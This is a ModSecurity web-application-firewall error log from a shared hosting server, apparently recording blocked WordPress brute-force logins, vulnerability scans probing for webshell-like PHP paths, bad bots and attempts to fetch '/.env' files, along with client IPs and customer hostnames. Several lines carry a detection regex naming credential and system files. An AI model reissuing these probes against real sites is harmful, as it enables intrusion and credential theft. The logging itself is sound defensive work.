[Tue May 26 17:22:20.299932 2026] [security2:error] [pid 882219:tid 882353] [client 203.194.101.7:50677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJdJ8tTkZcqimiXcTrqgAAAIk"]
[Tue May 26 17:22:20.300022 2026] [security2:error] [pid 882219:tid 882353] [client 203.194.101.7:50677] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJdJ8tTkZcqimiXcTrqgAAAIk"]
[Tue May 26 17:22:20.602327 2026] [security2:error] [pid 882219:tid 882310] [remote 216.73.160.240:0] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWJdJ8tTkZcqimiXcTrowAAq1o"]
[Tue May 26 17:22:21.100448 2026] [security2:error] [pid 882219:tid 882454] [client 62.60.130.228:61748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWJdZ8tTkZcqimiXcTrvgAAAO4"]
[Tue May 26 17:22:21.984754 2026] [security2:error] [pid 882219:tid 882369] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJdZ8tTkZcqimiXcTrygAAAJk"]
[Tue May 26 17:22:24.792798 2026] [security2:error] [pid 882219:tid 882224] [remote 88.198.165.116:55732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJeJ8tTkZcqimiXcTsHAABAgQ"]
[Tue May 26 17:22:24.941175 2026] [security2:error] [pid 882219:tid 882425] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJeJ8tTkZcqimiXcTsGQAAANE"]
[Tue May 26 17:22:25.487526 2026] [security2:error] [pid 882219:tid 882408] [client 87.106.152.203:58556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/images/images/cache.php"] [unique_id "ahWJeZ8tTkZcqimiXcTsMgAAAMA"], referer: www.google.com
[Tue May 26 17:22:25.604778 2026] [security2:error] [pid 882219:tid 882328] [remote 193.42.61.12:44658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWJeZ8tTkZcqimiXcTsMQAAj2w"]
[Tue May 26 17:22:26.372193 2026] [security2:error] [pid 882219:tid 882400] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJeZ8tTkZcqimiXcTsQgAAALg"]
[Tue May 26 17:22:27.347553 2026] [security2:error] [pid 882219:tid 882352] [client 223.235.98.214:7633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJe58tTkZcqimiXcTsYwAAAIg"]
[Tue May 26 17:22:27.347758 2026] [security2:error] [pid 882219:tid 882352] [client 223.235.98.214:7633] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJe58tTkZcqimiXcTsYwAAAIg"]
[Tue May 26 17:22:29.299225 2026] [security2:error] [pid 882219:tid 882383] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJfJ8tTkZcqimiXcTskwAAAKc"]
[Tue May 26 17:22:30.599425 2026] [security2:error] [pid 882219:tid 882361] [client 203.194.101.7:51018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJfp8tTkZcqimiXcTsxgAAAJE"]
[Tue May 26 17:22:30.600021 2026] [security2:error] [pid 882219:tid 882361] [client 203.194.101.7:51018] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJfp8tTkZcqimiXcTsxgAAAJE"]
[Tue May 26 17:22:30.684782 2026] [security2:error] [pid 882219:tid 882458] [client 121.229.156.82:51148] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.siliconelevators.in"] [uri "/"] [unique_id "ahWJfp8tTkZcqimiXcTsygAAAPI"]
[Tue May 26 17:22:30.684901 2026] [security2:error] [pid 882219:tid 882458] [client 121.229.156.82:51148] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.siliconelevators.in"] [uri "/"] [unique_id "ahWJfp8tTkZcqimiXcTsygAAAPI"]
[Tue May 26 17:22:31.534692 2026] [security2:error] [pid 882219:tid 882369] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJf58tTkZcqimiXcTs0wAAAJk"]
[Tue May 26 17:22:31.571090 2026] [security2:error] [pid 882219:tid 882411] [client 146.174.167.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJf58tTkZcqimiXcTs1wAAAMM"]
[Tue May 26 17:22:32.138823 2026] [security2:error] [pid 882219:tid 882438] [client 72.14.147.220:46898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/backend/.env"] [unique_id "ahWJgJ8tTkZcqimiXcTs7wAAAN4"]
[Tue May 26 17:22:32.139316 2026] [security2:error] [pid 882219:tid 882473] [client 72.14.147.220:46904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/api/.env"] [unique_id "ahWJgJ8tTkZcqimiXcTs8QAAAQE"]
[Tue May 26 17:22:32.144078 2026] [security2:error] [pid 882219:tid 882446] [client 72.14.147.220:46864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/.env"] [unique_id "ahWJgJ8tTkZcqimiXcTs-AAAAOY"]
[Tue May 26 17:22:32.201512 2026] [security2:error] [pid 882219:tid 882445] [client 72.14.147.220:46916] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/index.php"] [unique_id "ahWJgJ8tTkZcqimiXcTs8gAAAOU"]
[Tue May 26 17:22:32.203742 2026] [security2:error] [pid 882219:tid 882434] [client 72.14.147.220:46934] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/index.php"] [unique_id "ahWJgJ8tTkZcqimiXcTs9gAAANo"]
[Tue May 26 17:22:32.215260 2026] [security2:error] [pid 882219:tid 882395] [client 72.14.147.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/index.php"] [unique_id "ahWJgJ8tTkZcqimiXcTs_gAAALM"]
[Tue May 26 17:22:32.219238 2026] [security2:error] [pid 882219:tid 882430] [client 72.14.147.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/index.php"] [unique_id "ahWJgJ8tTkZcqimiXcTs_wAAANY"]
[Tue May 26 17:22:32.223927 2026] [security2:error] [pid 882219:tid 882415] [client 72.14.147.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/index.php"] [unique_id "ahWJgJ8tTkZcqimiXcTtAgAAAMc"]
[Tue May 26 17:22:32.237981 2026] [security2:error] [pid 882219:tid 882387] [client 72.14.147.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/index.php"] [unique_id "ahWJgJ8tTkZcqimiXcTtAAAAAKs"]
[Tue May 26 17:22:32.256479 2026] [security2:error] [pid 882219:tid 882429] [client 72.14.147.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/index.php"] [unique_id "ahWJgJ8tTkZcqimiXcTtBgAAANU"]
[Tue May 26 17:22:32.375005 2026] [security2:error] [pid 882219:tid 882356] [client 72.14.147.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/index.php"] [unique_id "ahWJgJ8tTkZcqimiXcTtCwAAAIw"]
[Tue May 26 17:22:32.552768 2026] [security2:error] [pid 882219:tid 882463] [client 72.14.147.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/index.php"] [unique_id "ahWJgJ8tTkZcqimiXcTtDgAAAPc"]
[Tue May 26 17:22:33.042947 2026] [security2:error] [pid 882219:tid 882399] [client 87.106.152.203:61217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/images/images/cache.php"] [unique_id "ahWJgZ8tTkZcqimiXcTtGwAAALc"], referer: www.google.com
[Tue May 26 17:22:34.058722 2026] [security2:error] [pid 882219:tid 882385] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJgZ8tTkZcqimiXcTtKgAAAKk"]
[Tue May 26 17:22:36.369697 2026] [security2:error] [pid 882219:tid 882459] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJg58tTkZcqimiXcTtWQAAAPM"]
[Tue May 26 17:22:38.127990 2026] [security2:error] [pid 882219:tid 882432] [client 223.235.98.214:12089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJhZ8tTkZcqimiXcTtjwAAANg"]
[Tue May 26 17:22:38.128134 2026] [security2:error] [pid 882219:tid 882432] [client 223.235.98.214:12089] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJhZ8tTkZcqimiXcTtjwAAANg"]
[Tue May 26 17:22:39.128066 2026] [security2:error] [pid 882219:tid 882400] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJhp8tTkZcqimiXcTtngAAALg"]
[Tue May 26 17:22:39.197219 2026] [security2:error] [pid 882219:tid 882269] [remote 113.190.40.93:32762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJh58tTkZcqimiXcTtqAAAyDE"]
[Tue May 26 17:22:41.036730 2026] [security2:error] [pid 882219:tid 882268] [remote 193.42.61.12:58020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWJiJ8tTkZcqimiXcTt2AAArDA"]
[Tue May 26 17:22:41.147836 2026] [security2:error] [pid 882219:tid 882354] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJiJ8tTkZcqimiXcTtzQAAAIo"]
[Tue May 26 17:22:41.867083 2026] [security2:error] [pid 882219:tid 882359] [client 203.194.101.7:51351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJiZ8tTkZcqimiXcTt5QAAAI8"]
[Tue May 26 17:22:41.867215 2026] [security2:error] [pid 882219:tid 882359] [client 203.194.101.7:51351] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJiZ8tTkZcqimiXcTt5QAAAI8"]
[Tue May 26 17:22:43.756354 2026] [security2:error] [pid 882219:tid 882388] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJi58tTkZcqimiXcTuDQAAAKw"]
[Tue May 26 17:22:45.636439 2026] [security2:error] [pid 882219:tid 882428] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJjZ8tTkZcqimiXcTuMwAAANQ"]
[Tue May 26 17:22:47.119596 2026] [security2:error] [pid 882219:tid 882471] [client 39.106.67.230:49763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.67.106.39.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.wrapmachines.com"] [uri "/caches/log/Zmlcd.php"] [unique_id "ahWJj58tTkZcqimiXcTuYwAAAP8"]
[Tue May 26 17:22:48.546141 2026] [security2:error] [pid 882219:tid 882458] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJkJ8tTkZcqimiXcTuegAAAPI"]
[Tue May 26 17:22:48.571103 2026] [security2:error] [pid 882219:tid 882357] [client 223.235.98.214:5326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJkJ8tTkZcqimiXcTuhwAAAI0"]
[Tue May 26 17:22:48.571221 2026] [security2:error] [pid 882219:tid 882357] [client 223.235.98.214:5326] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJkJ8tTkZcqimiXcTuhwAAAI0"]
[Tue May 26 17:22:50.376255 2026] [security2:error] [pid 882219:tid 882416] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJkZ8tTkZcqimiXcTupwAAAMg"]
[Tue May 26 17:22:50.582045 2026] [security2:error] [pid 882219:tid 882461] [client 104.43.242.179:8222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWJkp8tTkZcqimiXcTurwAAAPU"]
[Tue May 26 17:22:50.582178 2026] [security2:error] [pid 882219:tid 882461] [client 104.43.242.179:8222] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWJkp8tTkZcqimiXcTurwAAAPU"]
[Tue May 26 17:22:51.066285 2026] [security2:error] [pid 882219:tid 882359] [client 203.194.101.7:51650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJk58tTkZcqimiXcTuvAAAAI8"]
[Tue May 26 17:22:51.066405 2026] [security2:error] [pid 882219:tid 882359] [client 203.194.101.7:51650] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJk58tTkZcqimiXcTuvAAAAI8"]
[Tue May 26 17:22:52.134517 2026] [security2:error] [pid 882219:tid 882361] [client 104.43.242.179:8265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/x.php"] [unique_id "ahWJlJ8tTkZcqimiXcTu2AAAAJE"]
[Tue May 26 17:22:52.134654 2026] [security2:error] [pid 882219:tid 882361] [client 104.43.242.179:8265] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/x.php"] [unique_id "ahWJlJ8tTkZcqimiXcTu2AAAAJE"]
[Tue May 26 17:22:52.771276 2026] [security2:error] [pid 882219:tid 882278] [remote 82.223.24.195:44436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.24.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWJlJ8tTkZcqimiXcTu5QAA5Do"]
[Tue May 26 17:22:52.896035 2026] [security2:error] [pid 882219:tid 882459] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJlJ8tTkZcqimiXcTu5AAAAPM"]
[Tue May 26 17:22:53.140295 2026] [security2:error] [pid 882219:tid 882306] [remote 45.32.67.165:36178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWJlJ8tTkZcqimiXcTu8wAAxFY"]
[Tue May 26 17:22:53.986998 2026] [security2:error] [pid 882219:tid 882350] [client 104.43.242.179:8294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/wpconf.php"] [unique_id "ahWJlZ8tTkZcqimiXcTvGgAAAIY"]
[Tue May 26 17:22:53.987127 2026] [security2:error] [pid 882219:tid 882350] [client 104.43.242.179:8294] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/wpconf.php"] [unique_id "ahWJlZ8tTkZcqimiXcTvGgAAAIY"]
[Tue May 26 17:22:55.142012 2026] [security2:error] [pid 882219:tid 882358] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJlp8tTkZcqimiXcTvLwAAAI4"]
[Tue May 26 17:22:56.197468 2026] [security2:error] [pid 882219:tid 882387] [client 104.43.242.179:8282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/aaf.php"] [unique_id "ahWJmJ8tTkZcqimiXcTvVgAAAKs"]
